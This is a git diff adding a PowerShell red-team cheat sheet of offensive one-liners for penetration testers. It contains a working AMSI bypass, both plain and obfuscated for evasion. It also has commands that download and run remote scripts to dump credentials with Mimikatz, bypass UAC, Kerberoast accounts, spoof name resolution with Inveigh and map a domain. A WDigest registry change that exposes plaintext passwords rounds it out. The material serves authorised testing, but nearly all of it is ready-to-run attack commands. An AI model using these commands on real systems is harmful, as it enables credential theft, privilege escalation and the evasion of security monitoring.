myhkho · February 23, 2021 13:54 · Feb 18, 2021 · Feb 18, 2021 · Feb 18, 2021
diff --git a/PowerShell Red Team Cheat Sheet.md → PowerShell Red Team Cheat Sheet.txt b/PowerShell Red Team Cheat Sheet.md → PowerShell Red Team Cheat Sheet.txt
diff --git a/PowerShell Red Team Cheat Sheet.txt → PowerShell Red Team Cheat Sheet.md b/PowerShell Red Team Cheat Sheet.txt → PowerShell Red Team Cheat Sheet.md
@@ -3,6 +3,15 @@
 # Description: 
 #    Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
 
+# AMSI Bypass (Matt Graeber)
+Normal Version
+------------------------
+[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
+
+Attacker Obfuscated Version
+------------------------
+sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."AssEmbly"."GETTYPe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."getfiElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sETVaLUE"( ${nULl},${tRuE} )
+
 # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
 powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
 

diff --git a/PowerShell Red Team Cheat Sheet.txt b/PowerShell Red Team Cheat Sheet.txt
@@ -0,0 +1,44 @@
+# Pulled from https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70
+
+# Description: 
+#    Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
+
+# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
+powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
+
+# Invoke-Mimikatz: Dump credentials from memory
+powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
+
+# Import Mimikatz Module to run further commands
+powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"
+
+# Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
+powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"
+
+# PowerUp: Privilege escalation checks
+powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks”
+
+# Invoke-Inveigh and log output to file
+powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y  –Proxy Y -LogOutput Y -FileOutput Y"
+
+# Invoke-Kerberoast and provide Hashcat compatible hashes
+powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"
+
+# Invoke-ShareFinder and print output to file
+powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
+
+# Import PowerView Module to run further commands
+powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
+
+# Invoke-Bloodhound
+powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
+
+# Find GPP Passwords in SYSVOL
+findstr /S cpassword $env:logonserver\sysvol\*.xml
+findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)
+
+# Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
+runas /user:DOMAIN\USER /noprofile powershell.exe
+
+# Insert reg key to enable Wdigest on newer versions of Windows
+reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1